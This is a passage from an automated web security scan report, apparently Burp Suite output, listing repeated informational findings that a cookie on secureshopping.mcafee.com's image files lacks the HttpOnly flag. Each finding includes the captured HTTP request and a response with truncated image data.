Host:	http://secureshopping.mcafee.com
Path:	/images/btn_seeit_down.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_seeit_down.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.1.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:42:07 GMT
ETag: "5D7pOrfoU6t"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:07 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:07 GMT
Content-Length: 1702

GIF89a..$.....1R.Rl.-N..8..:.&F.....=. @....{..3T."B....,L....0P..>..7....5V.*J.2S.$D.......4V....(I....6W....>^..O.......'H.d{.4U.+L.7X..7..;..@.....8..<....C_.#C. @.=Y._w.1O.........................
...[SNIP]...

4.186. http://secureshopping.mcafee.com/images/btn_seeit_up.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/btn_seeit_up.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_seeit_up.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:29 GMT
ETag: "5D7pOrfoU7W"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:29 GMT
Content-Length: 1743

GIF89a..$.....1R.-N..8.&F..:.7X.!B.....=.... @..>.Rl.......3T.......Jh.,L.0P.y.....*J.5V.$D....2S.4V....(I.by....8X..O.......'G.4U.+L..7.....;.6W..8..?..8.#C..<....Da.:Y. ?............................
...[SNIP]...

4.187. http://secureshopping.mcafee.com/images/btn_updatesearch_up.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/btn_updatesearch_up.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_updatesearch_up.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/baby/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.7.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:42:28 GMT
ETag: "5D7pOrfoUtr"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:27 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:27 GMT
Content-Length: 868

GIF89a{......u................................z.....|....s.................x...........x.....s........r.....!.......,....{........m^i.h..l..p.n..9\..|....pH,......l:...tJ.Z.X... x...xL.....z.(i......
...[SNIP]...

4.188. http://secureshopping.mcafee.com/images/category_blank.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/category_blank.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category_blank.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:31 GMT
ETag: "5D7pOrfoVqO"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT
Content-Type: image/png; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:31 GMT
Content-Length: 4743

.PNG
.
...IHDR.......%......Qg.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........................................................................................................................
...[SNIP]...

4.189. http://secureshopping.mcafee.com/images/category_bottom.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/category_bottom.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category_bottom.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:31 GMT
ETag: "5D7pOrfoVuD"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT
Content-Type: image/png; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:31 GMT
Content-Length: 4988

.PNG
.
...IHDR.......*.....b.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........................................................................................................................
...[SNIP]...

4.190. http://secureshopping.mcafee.com/images/category_top.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/category_top.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category_top.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:29 GMT
ETag: "5D7pOrfoVqA"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT
Content-Type: image/png; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:29 GMT
Content-Length: 4729

.PNG
.
...IHDR.......(...../.t.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE.:J.........kkl.............`h....do..........6<.......z..HW...........1............DDE.Ug...*+-................"I........
...[SNIP]...

4.191. http://secureshopping.mcafee.com/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/favicon.ico HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.1.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:34 GMT
ETag: "5D7pOrfoUwA"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:34 GMT
Content-Type: text/html; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:34 GMT
Content-Length: 1017

GIF89a............]^`AAAijl...........1.@Y.p......3..=.
5.5V.Db..?. 4.;..4..E.....?..B..3.....&.Km..3.Vw.>g.Xs..7.......\~...........8...........9....#M.....K..7..:..2. ,..-..9..5.
2..)...........A.
...[SNIP]...

4.192. http://secureshopping.mcafee.com/images/footer-search-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/footer-search-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer-search-bg.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:32 GMT
ETag: "5D7pOrfoUip"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:31 GMT
Content-Length: 162

GIF89a..&....................................................................................................!.......,......&......a..i.FU.......c]W0 O...Lf.....;

4.193. http://secureshopping.mcafee.com/images/footer-search-left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/footer-search-left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer-search-left.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:30 GMT
ETag: "5D7pOrfoUpu"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:30 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:30 GMT
Content-Length: 615

GIF89a..&...............................................................................................................................................................................................
...[SNIP]...

4.194. http://secureshopping.mcafee.com/images/footer-search-right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/footer-search-right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer-search-right.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:30 GMT
ETag: "5D7pOrfoUpx"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:30 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:30 GMT
Content-Length: 618

GIF89a..&...............................................................................................................................................................................................
...[SNIP]...

4.195. http://secureshopping.mcafee.com/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logo.gif HTTP/1.1
